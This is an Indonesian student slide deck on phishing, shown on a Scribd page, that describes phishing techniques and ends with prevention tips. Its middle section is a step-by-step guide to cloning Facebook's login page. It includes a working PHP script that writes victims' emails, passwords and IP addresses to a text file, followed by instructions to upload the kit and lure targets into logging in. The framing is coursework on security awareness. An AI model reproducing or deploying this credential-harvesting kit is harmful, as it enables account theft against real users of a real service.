Scribd Logo
Unggah

Selamat datang di Scribd!

  • Kel 3 Phising

    Diunggah oleh

    Della Zilfitri
    151 tayangan12 halaman

    Hak Cipta

    © © All Rights Reserved

    Format Tersedia

    PPTX, PDF, TXT atau baca online dari Scribd

    Apakah menurut Anda dokumen ini bermanfaat?

    Apakah konten ini tidak pantas?

    Laporkan Dokumen Ini

    Hak Cipta:

    © All Rights Reserved
    Unduh sebagai PPTX, PDF, TXT atau baca online dari Scribd
    Tandai sebagai konten tidak pantas
    151 tayangan12 halaman

    Kel 3 Phising

    Diunggah oleh

    Della Zilfitri

    Hak Cipta:

    © All Rights Reserved
    Unduh sebagai PPTX, PDF, TXT atau baca online dari Scribd
    Tandai sebagai konten tidak pantas
    dari 12

    YAYASAN PERGURUAN TINGGI KOMPUTER (YPTK) PADANG

    UNIVERSITAS PUTRA INDONESIA “YPTK” PADANG

    KEAMANAN KOMPUTER
    “Phising”

    Anggota Kelompok :
    Della Zilfitri : 202321052
    Yosep Filki : 202321070

    UNIVERSITAS PUTRA INDONESIA “YPTK” PADANG


    PHISING SEBAGAI SALAH SATU BENTUK ANCAMAN
    DALAM DUNIA CYBER

    ISSN : 1978-6603

    UNIVERSITAS PUTRA INDONESIA “YPTK” PADANG


    Latar Belakang
    Dalam dunia komunikasi data global dan perkembangan teknologi informasi yang
    senantiasa berubah serta cepatnya perkembangan software, keamanan merupakan suatu
    isu yang sangat penting, baik itu keamanan fisik, data maupun aplikasi. Masalah keamanan
    dankerahasiaan data merupakan salah satu aspek penting dari suatu sistem informasi.
    Keamanan komputer adalah suatu cabang teknologi yang dikenal dengan nama
    keamanan informasi yang diterapkan pada komputer. Sasaran keamanan komputer antara
    lain adalah sebagai perlindungan informasi terhadap pencurian atau korupsi, atau
    pemeliharaan ketersediaan, seperti dijabarkan dalam kebijakan keamanan.
    Dalam keamanan sistem komputer yang perlu dilakukan adalah untuk mempersulit
    orang lain untuk mengganggu sistem yang dipakai, baik itu menggunakan komputer yang
    sifatnya stand alone, jaringan local maupun jaringan global. Inti dari keamanan komputer
    adalah melindungi komputer dan jaringannya dengan tujuan mengamankan informasi yang
    berada di dalamnya

    UNIVERSITAS PUTRA INDONESIA “YPTK” PADANG


    Dalam ruang lingkup keamanan komputer, phising adalah salah bentuk kejahatan
    elektronik dalam bentuk penipuan. Dimana proses phising ini bermaksud untuk
    menangkap informasi yang sangat sensitif seperti username, password dan detil kartu
    kredit dalam bentuk menyaru sebagai sebuah entitas yang dapat dipercaya/ legitimate
    organization dan biasanya berkomunikasi secara elektronik.
    Phising dikenal juga sebagai “Brand spoofing” atau “Carding” adalah sebuah
    bentuk layanan yang menipu anda dengan menjanjikan keabsahan dan keamanan
    transfer data yang anda lakukan. Menurut Felten et al spoofing (1997) dapat
    didefinisikan sebagai “Teknik yang digunakan untuk memperoleh akses yang tidak sah
    ke suatu komputer atau informasi, dimana penyerang berhubungan dengan pengguna
    dengan berpura-pura memalsukan bahwa mereka adalah host yang dapat dipercaya”.

    UNIVERSITAS PUTRA INDONESIA “YPTK” PADANG


    Cara kerja Phising
    Dari definisi phising dapat diketahui cara kerja dari phising tersebut yang
    dilakukan untuk menjebak korban oleh sang penjebak (phisher). Phising yaitu
    aktivitas seseorang untuk mendapatkan informasi rahasia user dengan cara
    menggunakan email dan situs web palsu yang tampilannya menyerupai
    tampilan asli atau resmi web sebenarnya. Informasi yang didapat atau dicari
    oleh phiser adalah berupa password account atau nomor kartu kredit korban.
    Penjebak (phisher) menggunakan email, banner atau pop-up window untuk
    menjebak user agar mengarahkan ke situs web palsu (fake webpage), dimana
    user diminta untuk memberikan informasi pribadinya. Disinilah phisher
    memanfaatkan kecerobohan dan ketidak telitian user dalam web palsu tersebut
    untuk mendapatkan informasi.

    UNIVERSITAS PUTRA INDONESIA “YPTK” PADANG


    aspek-aspek ancaman yang terinfeksi oleh virus phising
    Manipulasi Link Sebagian teknik phising menggunakan manipulasi link sehingga yang terlihat seperti alamat dari
    institusi yang asli. URL yang salah ejaannya atau penggunaan subdomain adalah trik umum digunakan oleh
    phisher, seperti contoh URL dibawah: www. Micosoft.com bukannya www.microsoft.com
    Phiser telah menggunakan Gambar (bukan teks) sehingga mengecoh pengguna sehingga menyerahkan
    informasi pribadinya. Ini adalah alasan Gmail atau Yahoo akan mematikan gambar secara default untuk email
    yang masuk. Gambar 2 adalah salah satu contoh email phising:

    Untuk membuat e-mail phising tampak lebih asli, para phisher/scammer akan meletakkan: Sebuah link yang
    dihubungkan ke halaman web yang sah, tetapi sebenarnya membawa anda ke sebuah laman web phising
     

    UNIVERSITAS PUTRA INDONESIA “YPTK” PADANG


    Teknik Phising

    Dalam memancing korbannya seorang phiser melakukan beberapa teknik antara lain:
    1. Email Spoofing
    Teknik ini biasa digunakan phiser dengan mengirim email ke jutaan penggunaan dengan me’nyaru’ berasal dari institusi resmi.
    Biasanya email berisi pemintaan nomor kredit, password atau mendownload form tertentu
    2. Pengiriman Berbasis Web
    salah satu teknik Phising yang paling canggih. Juga dikenal sebagai “man-in-themiddle”, hacker terletak diantara situs web asli dan
    sistem phising
    3. Pesan Instan (chatting)
    Olah pesan cepat adalah metode dimana pengguna menerima pesan dengan link yang mengarahkan mereka ke situs web Phising
    palsu yang memiliki tampilan yang sama dan merasa sebagai situs yang sah.
    4. Trojan hosts
    Trojan hosts, hacker terlihat mencoba u ntuk login ke account pengguna anda untuk mengumpulkan kredensial melalui mesin lokal.
    Informasi yang diperoleh kemudian dikirim ke phiser
    5. Manipulasi tautan (link)
    Manipulasi link adalah teknik dimana phisher mengirimkan link ke sebuah website. Bila pengguna mengklik pada link tersebut maka
    akan terbuka ke website phisher bukan link website sebenarnya.
    6. Malware Phising
    Penipuan phising melibatkan malware memerlukan cara untuk dijalankan pada komputer pengguna. Malware ini biasanya melekat
    pada email yang dikirimkan kepada pengguna oleh phisher. Setelah korban mengklik pada link maka malware akan mulai berfungsi.
    Malware tersebut terkadang disertakan pada file download.

    UNIVERSITAS PUTRA INDONESIA “YPTK” PADANG


    PEMBAHASAN
    Phising dalam bentuk web spoofing dapat dibuat menggunakan software MSFront
    Page, XAMPP, Notepad, serta Dreamweaver. Berikut penjelasan bagaimana cara
    pembuatan Phising:
    1. Tentukan target website (dalam pembahasan ini http://www.facebook.com/ )
    2. Tekan CTRL+U (nanti akan tampil script).
    3. Select all (CTRL+A), trus copy (CTRL+C), pastekan(CTRL+V) di notepad.
    4. Search (CTRL+F), lalu masukan. action=https://www.facebook.com/login.p hp?
    login_attempt=1
    5. Ganti https://www.facebook.com/login.ph p?login_attempt=1 dengan script.php
    6. Save file tersebut dengan nama index.html
    7. New file (CTRL+N)
    8. Pastekan script berikut ini [9]

    UNIVERSITAS PUTRA INDONESIA “YPTK” PADANG


    Script
    <?php
    $file = "storage.txt";
    $username = $_POST['email'];
    $password = $_POST['pass'];
    $ip = $_SERVER['REMOTE_ADDR'];
    $today = date("F j, Y, g:i a");
    • $handle = fopen($file, 'a');
    • fwrite($handle, "++++++++++++++++++++++++++++++++++ ++++++++++++++++++"); fwrite($handle, "\n");
    • fwrite($handle, "Email: ");
    • fwrite($handle, "$username");
    • fwrite($handle, "\n");
    • fwrite($handle, "Password: ");
    • fwrite($handle, "$password");
    • fwrite($handle, "\n");
    • fwrite($handle, "IP Address: ");
    • fwrite($handle, "$ip");
    • fwrite($handle, "\n");
    • fwrite($handle, "Date Submitted: ");
    • fwrite($handle, "$today");
    • fwrite($handle, "\n");
    • fwrite($handle, "++++++++++++++++++++++++++++++++++ ++++++++++++++++++");
    • fwrite($handle, "\n");
    • fwrite($handle, "\n");
    • fclose($handle);
    • echo " <script LANGUAGE=\”JavaScript\”>
    • <!—
    • window.location=\"http://www.facebook. com\";
    • // -->
    • </script>";
    • ?></div>
    • </div>
    • </form>

    UNIVERSITAS PUTRA INDONESIA “YPTK” PADANG


    9. Save file dengan nama script.php
    10. New file (CTRL+N)
    11. Ketik : Hasil Phising akan tersimpan disini
    12. Save file dengan nama storage.txt
    13. Upload file itu ke hostingan anda.
    14.Sekarang anda buka domain anda dan jadilah phising
    facebook, Silahkan anda jebak target anda untuk masuk ke web
    phising anda dan suruh loginkan akun facebooknya disitu.
    Alhasil email dan passwordnya akan tersimpan di logs.tx

    UNIVERSITAS PUTRA INDONESIA “YPTK” PADANG


    Kesimpulan
    Phising adalah sebuah bentuk layanan yang bersifat menipu dengan menjanjikan keabsahan dan
    keamanan transfer data.
    Berikut tips Kaspersky Lab untuk mencegah dari serangan phising:
    1. Untuk situs sosial seperti Facebook, buat bookmark untuk halaman login atau mengetik URL
    www.facebook.com secara langsung di browser address bar.
    2. Jangan mengklik link pada pesan email.
    3. Hanya mengetik data rahasia pada website yang aman.
    4. Mengecek akun bank Anda secara regular dan melaporkan apapun yang mencurigakan kepada bank
    Anda.
    5. Kenali tanda giveaway yang ada dalam email phising
    6. Menginstall software untuk kemanan internet dan tetap mengupdate antivirus.
    7. Waspada terhadap email dan pesan instan yang tidak diminta.
    8. Berhati-hati ketika login yang meminta hak administrator. Cermati alamat URL-nya yang ada di address
    bar.
    9. Back up data anda

    UNIVERSITAS PUTRA INDONESIA “YPTK” PADANG


    YAYASAN PERGURUAN TINGGI KOMPUTER (YPTK) PADANG
    UNIVERSITAS PUTRA INDONESIA “YPTK” PADANG

    TERIMAKASIH

    UNIVERSITAS PUTRA INDONESIA “YPTK” PADANG

    Anda mungkin juga menyukai